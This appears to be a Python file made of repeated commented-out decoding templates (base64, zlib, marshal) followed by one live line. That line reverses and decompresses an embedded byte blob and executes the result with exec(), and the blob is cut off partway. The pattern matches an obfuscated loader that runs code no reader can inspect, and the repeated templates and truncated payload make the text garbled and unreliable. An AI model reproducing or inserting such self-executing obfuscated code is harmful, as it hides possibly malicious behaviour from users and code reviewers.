#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#__import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
#__import__('base64').b32decode(__[::-1])
#exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))"
_ = lambda __ : __import__('zlib').decompress(__[::-1]);exec((_)(b'o\xab\x8a\xb3\x00\xff\xd4\xd4\xfa\xf4\xecv-\xebl\xe2m~\x8d\xe6 \xfbM\xe1\xd9\xf8\xaa\x0b\xb3A5\xf9\x08]\x10\x17\xf4\xf9D\x90\x0e\xf8\x8c\x817\xc6O\xc7\xb2\xcb\x94r\xfa\x11~\xc3\x0e\xd1f\x8cA\x05\x0byJ\xda\xa1\xd1\x14\xa1oM8\xa0\x11S\xa1\xea\xbd\x9a~\xbf\x97\x1e9\x83\x1c@\xb2\x0e\xf9&\x91\xc2\xd6~\xfd\xba\x96g>#\xb2x}\x95\x9e\x9c\x89:D\x8em\xb7m\x86h\x0eY\xdf\xe3K\xd4\xaa\xd6\xd1\xf2\xf8\x7f\x8b`\xc8S\xac\xbb<\xef\x8bm\xfe.\xad<\\\xa2\xd3m\xeb\xdd\xa6x\x88;\x12\x03\xda\x0b\x0bDz\x99\xa3\xc6[\x15\xbd\x06\xd6\xd9p`\x9e\x0c\xf7;+b\x93\x97\xd5Z\xc3O\xef\xd1\xba\x84\xf73}\x89|0a\x05\x92(`\x0cS\x12C\xa1\xb6\xdb`\x1faO,?Zn\x1e\xd9\xad\x04a?\xfe\xe7\x16FO\x8c$\x0fG\x008H\x81@\x9dTES\xfe\x88w\xb9\xbd\xfc\x16"\xd7\xbd\xe2\x98]VF\xd2\xa9\x82\xa1M\xd3\xee\xcc\xab\x15L\x04m\x912T\x02d\x07{\xd8\xfe&\xe8\x99;/\xf0Q\xf0\x8a\xf8\x95\x00\x08)\xfd\x8b|\x88\xaf\x93\x9eL\xae\xf8\x8dmU\xc2\xbe7\x83--\xb1\xc3\xb2{\xcd\xad\xfa[\xc6\x01*\x0f\xd1\x9aMK\xdf \xf2\n\x7f\xd9\x8d\x8d\xbb\xd7\xf2\xf9\x7f\xb0\x9e\xe8S\xd7\xc6\x03\x99Zrm\xbc\xc4\x1a\xa5P\xfb\x8ekiN\x17}\x07\xdc\xd7w\x19\xacHBtC\x84\xe4\xd7\x07\xbbt\x14\x91\x99\xf8\xb1].\xd7\x8d\x8d\xc0\xaf;\xec\xc3\x9b\x83\xa2P\xd9\x8f&\xad\x99\xf3\x06L]]\xe4\x0
